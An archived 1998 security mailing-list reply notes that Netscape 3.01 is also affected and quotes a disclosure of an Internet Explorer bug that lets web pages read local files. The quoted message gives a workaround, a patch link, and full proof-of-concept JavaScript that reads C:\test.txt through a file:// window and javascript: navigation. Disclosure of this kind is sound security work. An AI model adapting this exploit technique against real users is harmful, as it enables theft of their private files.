Re: IE can read local files

From: Mike Dion (robingat_private)
Date: Sat Sep 05 1998 - 04:36:29 PDT

Next message: Lynda L. True: "Re: IE can read local files"

Previous message: Joao Manuel Carolino: "Buffer overflow in bash 1.14.7(1)"
Maybe in reply to: Georgi Guninski: "IE can read local files"
Next in thread: Lynda L. True: "Re: IE can read local files"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Netscape Navigator Version 3.01 is vulnerable too...
I didn't test any other netscape versions...

At 04:33 98-09-05 -0400, Georgi Guninski wrote:
>There is a bug in Internet Explorer 3, 4.0, 4.01 (for version information
see Microsoft's info below),
>which allows a specially designed web page to read text or HTML files from
the user's computer
>and send their contents to an arbitrary host, even if the user is behind
firewall. The bug uses Javascript and
>the file name and location must be known.
>
>Another way to exploit this bug is to send a specially designed message to
an Outlook Express/IE4  user.
>
>Demonstration of this is available at:
http://www.geocities.com/ResearchTriangle/1711/good-read.html
>
>Workaround: Disable Javascript.
>Microsoft has released a patch at:
http://www.microsoft.com/security/bulletins/ms98-013.htm
>
>Georgi Guninski
>http://www.geocities.com/ResearchTriangle/1711
>
>The source of the page:
>----Cut here---
><HTML>
><HEAD><TITLE>Read text/HTML file with Internet Explorer 4.01></TITLE></HEAD>
><BODY>
>This demonstrates a bug in IE 4.01 under Windows 95 (don't know for other
versions), which allows reading text or HTML file on the user's machine.
><B>Create the file c:\test.txt</B> and its contents are shown in a message
box. The file may be sent to an arbitrary server even if behind a firewall.
><BR>
>To test it, you need Javascript enabled.
><BR>
>This file is created by <A
HREF=http://www.geocities.com/ResearchTriangle/1711>Georgi Guninski.</A>
>
><SCRIPT LANGUAGE="JAVASCRIPT">
>
>alert("This page demonstrates reading the file C:\\test.txt (you may need
to create a short file to view it)");
>
>
>var x=window.open('file://C:/test.txt');
>x.navigate("javascript:eval(\"var
a=window.open('file://C:/test.txt');r=a.document.body.innerText;alert(r);\")
");
>
></SCRIPT>
></BODY>
></HTML>
>
>
>____________________________________________________________________
>Get free e-mail and a permanent address at http://www.netaddress.com/?N=1
>
>

Next message: Lynda L. True: "Re: IE can read local files"
Previous message: Joao Manuel Carolino: "Buffer overflow in bash 1.14.7(1)"
Maybe in reply to: Georgi Guninski: "IE can read local files"
Next in thread: Lynda L. True: "Re: IE can read local files"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:15:00 PDT